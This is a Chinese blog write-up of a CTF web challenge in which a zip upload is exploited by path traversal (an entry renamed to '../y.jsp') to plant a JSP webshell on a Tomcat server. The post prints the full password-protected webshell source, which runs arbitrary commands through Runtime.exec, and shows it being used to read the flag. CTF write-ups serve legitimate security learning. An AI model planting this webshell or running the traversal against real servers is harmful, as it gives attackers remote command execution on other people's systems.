第三届金盾信安杯网络安全大赛_web_上传你的压缩包吧

最新推荐文章于 2022-12-20 22:11:32 发布
最新推荐文章于 2022-12-20 22:11:32 发布
阅读量808 收藏 2
点赞数 1
分类专栏: 比赛wp 文章标签: Web CTF web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/RABCDXB/article/details/121895267
版权
本文介绍了如何利用CTF比赛中常见的文件上传漏洞,通过上传含有恶意代码的zip文件并修改文件路径,实现目录穿越,最终找到并执行flag.jsp来获取比赛旗标。详细步骤包括使用010Editor修改zip文件内容,以及通过jsp木马执行系统命令。虽然成功执行了木马,但作者对于目录穿越的原理还需进一步理解。
摘要由CSDN通过智能技术生成

上传你的压缩包吧

文章目录

解题过程

打开容器,可以进行文件上传,到需要是压缩包
在这里插入图片描述

随便上传一个压缩包,得到上传文件路径

:/usr/local/tomcat/webapps/ROOT/upload/b3eef5e5-0b95-4b1e-a837-684d3e248726.zip;Size:522;

比赛当时的思路是在一个博客上看到的,链接为ctf 文件上传总结_njqfb的博客-CSDN博客_ctf文件上传总结

在这里插入图片描述

我们可以将一个木马压缩为zip文件,然后用010editor修改几个字符(目录穿越),那么就可以在zip上一级目录生成木马文件

网上找的jsp一句话木马,利用方式为?pwd=023&cmd=ls

<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp +"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>

添加到sk1y.zip,然后010editor进行修改,将其一前一后的sk1y.jsp使用调整为目录穿越 ,sk1y.jsp改为 ../y.jsp

在这里插入图片描述

然后上传该压缩包

在这里插入图片描述

然后访问

url/y.jsp?pwd=023&cmd=ls

在这里插入图片描述

木马可以正常运行之后,根据我们之前测试的zip文件上传回显的目录位置,进行搜索

测试压缩包的回显
/usr/local/tomcat/webapps/ROOT/upload/b3eef5e5-0b95-4b1e-a837-684d3e248726.zip;Size:522;

查看目录,发现flag.jsp
在这里插入图片描述

然后查看该文件,即可得到flag
在这里插入图片描述

但是有个问题,就是压缩包目录穿越的原理还不是很懂,之后理解的话会继续更新
未完待续——

参考链接

  1. ctf 文件上传总结_njqfb的博客-CSDN博客_ctf文件上传总结
Sk1y
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
河南省第二届“金盾信安杯网络安全大赛解题思路
cz___g的博客
12-23 1635
河南省第二届“金盾信安杯网络安全大赛 真潇洒解题思路: CRYPTO:加密第一题 下载base文件,出现解题的内容 解密内容出现二维码 通过扫描二维码,发现加密得密文格式与flag格式非常相似。 F#S<YReBy{f.WwU{CSve’n*D 进行解密尝试 base92(unicode编码)解码成功解出 flag{you_very_good!!} CRYPTO:凯撒密码 从看到题目开始猜测,先是凯撒密码,凯撒密是是一种最简单且最广为人知的加密技术。它是一种替换加密的技术,明文中的所有字母都在字
CTF网络安全大赛工具包集合
12-21
针对网络安全大赛的部分方向所需要的工具的集合
河南省“第三届金盾信安杯“部分WP
MXPXT的博客
01-05 998
河南省"第三届金盾信安杯"部分WP Crypto Hi There 下载文件,打开发现一串字符,搜索在线栅栏解密,每组字数为4得到flag 低音吉他普 工具(base全家桶):https://github.com/mufeedvh/basecrack 下载文件发现一大串字符用base32解密, 得到字符串用base64解密, 得到字符串用base32解密, 得到字符串用base16解密, [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-LMH5BnZh-1641391
第二届“金盾信安杯网络安全大赛WEB Writeup
Firebasky的博客
12-21 1150
博主没有参加这个比赛,但是是小伙伴分享的题,做了一下,质量还不错,最后是通过复现的。写了一下自己的感触。 链接:https://pan.baidu.com/s/1psOX409XV-RwWmPbgXM-pg 提取码:xp8y 复制这段内容后打开百度网盘手机App,操作更方便哦 ...
第二届“金盾信安杯网络安全大赛misc部分wp
没用的阿吉
02-06 856
文章目录前言一、4位数字二、小火龙三、五瓶药水 前言 全为miscwp 一、4位数字   下载后得到一个压缩包,打开需要密码,文件名已经提示为四位数字,所以直接上ARCHPR进行爆破   爆破拿到密码9156   打开后是两个文件   在路飞的烦恼中直接看到社会主义核心价值观直接解密,贴上解密网址https://ctf.bugku.com/tool/cvecode解密后得到 ++++++++[>>++>++++>++++++>++++++++>+++++++++
第四届金盾信安杯.zip
12-18
2022年第四届金盾信安杯题目Misc+Reverse+Crypto
2020年12月20日-河南省金盾杯 JDBCTF Crypto+Misc题目打包
12-21
【标题】2020年12月20日的“河南省金盾杯 JDBCTF Crypto+Misc题目打包”是一场网络安全竞赛的题目集合,主要涵盖了密码学(Crypto)和杂项(Misc)两大类别。这样的比赛通常旨在检验参赛者在信息安全领域的综合能力...
金盾信安比赛记录.pdf
12-12
这篇记录主要涵盖了多个网络安全竞赛中的挑战,涉及的知识点包括Web安全、密码学、逆向工程以及编码解码技巧。下面是对每个挑战的详细解释: 1. **Web安全 - 条件竞争漏洞** 在这个挑战中,参赛者利用了一个条件...
飘零网络验证金盾V3.0WEB
09-30
飘零网络验证金盾V3.0WEB版,做收费软件的必备工具
(网络整理精品文档)金盾工程安全保障体系总体设计方案v3.pptx
11-25
(网络整理精品文档)金盾工程安全保障体系总体设计方案v3.pptx
2021-河南省金盾杯-部分题目wp(详细)
02-06
WEB上传你的头像吧、上传你的压缩包吧、管理员才能拿flag Crypto:Hi There、低音吉他谱、未完成的宣传图 Misc:潦草的笔记、这可是关键信息、hello-world Reverse:Re1、Re2、Re4
金盾杯2022-AGCTFS战队 wp
最新发布
akxnxbshai的博客
12-20 2430
信安金盾杯,pwn爷(加re)不在,只能打成这样了。
第二届金盾信安杯 web wp1-3
giaogiao123的博客
12-22 3177
by 七岁。 web1 考察命令执行 shell命令操作符 基本上过滤了所有可用的命令 平时我们都是ls 查看目录 仔细发现dir命令并没有被禁止 所以我们可以dir%09.%09 也是这样的 . 表示当前目录 然后就是读文件命令 被ban了那么多还有几个忽略了 cut 命令awk sed fmt等等 来看看cut命令 试一试别的 等等,最后payload cmd=cut%09-f%091%09F14g_1s_h4rehaha.php%09 web2 payload: Class W
2021-12-12金盾杯Re Wp
qq_52250819的博客
12-15 521
Re1 flag = 'gnbc~0221gg00>4f;g221944=1>62c61=3d71~' key = [1,2,3,4,5,6,7] aaa = [] for i in range(0,len(flag)): a=ord(flag[i]) aaa.append(a^key[i%7]) print(''.join(map(chr,aaa))) flag{6533dc5695d8c74686794813a5585c63} Re2 Main函数没有用.
第二届金盾信安杯部分wp
doraemon12345的博客
12-21 798
1.注意数字 打开压缩包是个图片,分离得到一个加密压缩包,看似加密实则是伪加密,修正后得到1.txt,是一个多层base64,解密后得到 但是这并不是flag,题目提示注意数字,图片上是李白的诗,有数字3和9,一开始以为是凯撒或者栅栏,试过之后无果,就去查还有哪些移位密码,找到仿射密码比较符合已知条件解密得到flag 2.小火龙 下载文件是个jpg图片放到winhex里查看,发现是png图片,拉到最底部,看到压缩包flag.txt,和pass 手动分离得到压缩包,然后用密码打开得到flag 3.我和十
2021 金盾杯 pwn3 wp
yongbaoii的博客
01-20 619
保护显然是全开 放size的chunk跟放地址的chunk挨着 然后数组能越界 所以当我们申请序号是16的chunk的时候 chunk的地址会写在chunk0的size地方 就造成了堆溢出 然后我们申请的chunk只能是large bin里的。 所以这道题说白了就是 2.27 large bin 堆溢出。 我们试图考虑利用攻击global_max_fast的手法,我们虽然能够覆盖到global_max_fast,但是我们申请的chunk的大小不够,不够我们后续的chunk释放分配到_IO_list_.
河南省第三届金盾信安杯网络安全大赛部分wp
七堇年的博客
12-23 4012
河南省第三届金盾信安杯网络安全大赛部分wp
2021 金盾杯 pwn4
yongbaoii的博客
01-19 370
金盾抗DDoS系统:保护网络安全的利器
"金盾抗拒绝服务系统是专业的抗DDoS攻击设备,旨在在保障业务系统正常运行的同时,防御并记录DDoS攻击源,提供网络安全证据。金盾公司成立于2002年,专注于提供抗DDoS解决方案和网络安全产品,拥有强大的研发团队和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值